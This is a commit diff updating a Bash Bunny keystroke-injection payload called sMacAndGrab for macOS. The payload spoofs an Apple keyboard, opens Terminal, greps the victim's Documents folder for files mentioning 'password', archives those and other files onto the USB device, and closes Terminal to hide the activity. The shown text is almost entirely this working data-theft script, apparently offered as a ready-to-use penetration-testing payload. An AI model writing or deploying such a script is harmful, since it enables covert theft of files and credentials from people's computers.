updates sMacAndGrab for bashbunny fw1.1 (#202)

pull/207/head
Alex Flores 2017-04-26 17:04:38 -10:00 committed by Sebastian Kinne
parent 22cbf92a3b
commit ca9e53c5a8
2 changed files with 5 additions and 10 deletions

View File

@ -3,14 +3,14 @@
# Title: sMacAndGrab
# Author: audibleblink
# Target: macOS
# Version: 1.1
# Version: 1.2
#
# Backup a list of files from macOS
#
# Yellow (blinking)...Attacking
# Green...............Finished
LED G R 500
LED ATTACK
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
# make the loot directory on the BashBunny
@ -50,16 +50,11 @@ files_to_copy=(
"\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET
)
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK RUN OSX terminal
QUACK DELAY 4000
# the more files in $files to copy, the longer tar will take to compress
# one-liner because we want the move command to wait for tar to finish
QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal
QUACK ENTER
# sync the filesystem
sync
LED G
LED FINISH

View File

@ -1,7 +1,7 @@
# sMacAndGrab
Author: audibleblink
Version: Version 1.1
Version: Version 1.2
Target: macOS
## Description